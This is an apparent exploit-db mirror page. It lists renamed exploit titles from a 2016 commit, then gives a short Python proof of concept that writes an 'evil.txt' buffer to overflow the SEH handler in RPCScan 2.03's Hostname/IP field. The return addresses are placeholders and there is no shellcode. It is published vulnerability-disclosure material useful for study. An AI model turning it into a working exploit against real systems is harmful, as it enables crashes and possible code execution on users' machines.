bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/39789.py
Offensive Security 01664c67b8 DB: 2016-05-10 
11 new exploits

JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7
JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7

BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)

Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)
Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)

RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)
RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)

UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)
UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)

The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)
The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)

Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS
GNU Bash - Environment Variable Command Injection (ShellShock)
Bash - Environment Variables Code Injection Exploit (ShellShock)
GNU Bash - Environment Variable Command Injection (Shellshock)
Bash - Environment Variables Code Injection Exploit (Shellshock)

OpenVPN 2.2.29 - ShellShock Exploit
OpenVPN 2.2.29 - Shellshock Exploit

Bash - CGI RCE Shellshock Exploit (Metasploit)
Bash CGI - RCE Shellshock Exploit (Metasploit)

PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)
PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)

OSSEC 2.8 - Privilege Escalation
OSSEC 2.8 - hosts.deny Privilege Escalation

ShellShock dhclient Bash Environment Variable Command Injection PoC
dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)

OSSEC 2.7 <= 2.8.1 - Local Root Escalation
OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)

BigTree CMS Cross Site Request Forgery Vulnerability

Advantech Switch Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)

Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes
Ajaxel CMS 8.0 - Multiple Vulnerabilities
i.FTP 2.21 - Host Address / URL Field SEH Exploit
Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution
ZeewaysCMS - Multiple Vulnerabilities
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation
Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)
RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC
ImageMagick Delegate Arbitrary Command Execution
Ruby on Rails Development Web Console (v2) Code Execution
2016-05-10 05:02:47 +00:00

30 lines
1.1 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
# Exploit Title : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 08/05/2016
# Vendor Homepage : http://samspade.org
# Software Link : http://www.mcafee.com/in/downloads/free-tools/rpcscan.aspx#
# Tested Version : 2.03
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#0012FAA0 43434343
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH Frame is 536
buffer = "A"*536
# Address of the Next SEH Frame
nseh = "B"*4
# Address to the Handler Code, Generally P/P/R Address
seh = "C" *4
f = open("evil.txt", "wb")
f.write(buffer+nseh+seh)
f.close()
Reference in a new issue View git blame Copy permalink